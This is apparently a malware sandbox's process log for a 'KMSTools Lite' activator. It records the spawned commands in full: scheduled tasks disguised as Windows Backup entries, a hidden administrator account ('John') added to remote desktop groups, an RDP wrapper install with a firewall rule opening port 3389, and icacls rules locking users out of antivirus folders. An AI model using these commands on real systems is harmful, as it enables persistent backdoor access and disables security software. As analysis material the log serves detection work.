"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6164 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4836,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3280,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5004,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5392 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3988 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6816,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5828,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5456 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3568,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5468 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3416,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5324 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5468,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=6160 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5560,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=3288 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"

C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe

"C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6840,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:8

C:\KMS Tools Lite Portable\KMSTools Lite.exe

"C:\KMS Tools Lite Portable\KMSTools Lite.exe"

C:\KMS Tools Lite Portable\GSetup.exe

"C:\KMS Tools Lite Portable\GSetup.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y

C:\ProgramData\Setup\install.exe

C:\ProgramData\Setup\install.exe -palexpassword

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x510 0x514

C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe

"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*

C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe

"C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"

C:\ProgramData\Setup\KMS.exe

"C:\ProgramData\Setup\KMS.exe"

C:\ProgramData\Setup\update.exe

"C:\ProgramData\Setup\update.exe"

C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe

"C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*

C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe

"C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\KMS Tools Lite Portable\Programs\Office Installer+\readme.txt

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=3376,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5368,i,3155165355887713747,16770589109771642233,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1

C:\ProgramData\Microsoft\win.exe

C:\ProgramData\Microsoft\win.exe -ppidar

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ff847c7f208,0x7ff847c7f214,0x7ff847c7f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1852,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2608,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2296,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=3224 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4228,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4244 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4376,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4756 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4728,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4176 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5332,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5316 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\Windows\system32\sc.exe

sc start appidsvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat

C:\Windows\system32\sc.exe

sc config appidsvc start= auto

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

C:\ProgramData\Setup\svchost.exe

C:\ProgramData\Setup\svchost.exe -ppidar

C:\ProgramData\Setup\IP.exe

"C:\ProgramData\Setup\IP.exe"

C:\ProgramData\Setup\smss.exe

"C:\ProgramData\Setup\smss.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe"

C:\ProgramData\Windows Tasks Service\winserv.exe

"C:\ProgramData\Windows Tasks Service\winserv.exe" -second

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net user John 12345 /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add

C:\Windows\system32\net.exe

net user John 12345 /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user John 12345 /add

C:\Windows\system32\net.exe

net localgroup "Администраторы" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\RealtekHD\taskhostw.exe

C:\Windows\system32\net.exe

net localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add

C:\Windows\system32\net.exe

net localgroup "Administrators" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add

C:\Windows\system32\net.exe

net localgroup "Administradores" John /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add

C:\Windows\system32\net.exe

net localgroup "Remote Desktop Users" john /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add

C:\Windows\SysWOW64\unsecapp.exe

C:\Windows\SysWOW64\unsecapp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat

C:\ProgramData\RDPWinst.exe

C:\ProgramData\RDPWinst.exe -i

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5748,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5776,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)

C:\Windows\system32\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\system32\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\system32\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls C:\FRST /deny system:(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)

